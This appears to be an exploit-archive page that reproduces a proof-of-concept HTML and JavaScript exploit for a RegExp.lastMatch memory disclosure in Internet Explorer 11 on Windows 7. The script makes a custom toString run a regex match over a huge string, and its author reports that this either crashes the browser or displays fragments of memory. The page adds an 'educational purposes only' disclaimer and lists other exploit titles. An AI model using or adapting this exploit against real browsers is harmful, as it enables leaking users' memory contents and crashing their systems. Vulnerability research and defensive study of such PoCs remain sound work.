Internet explorer regexp.lastmatch memory disclosure Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-03-20 | Type : dos | Platform : windows
This exploit / vulnerability Internet explorer regexp.lastmatch memory disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

=========================================
*/

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

/*
=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

Internet explorer regexp.lastmatch memory disclosure


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Internet explorer regexp.lastmatch memory disclosure Vulnerability / Exploit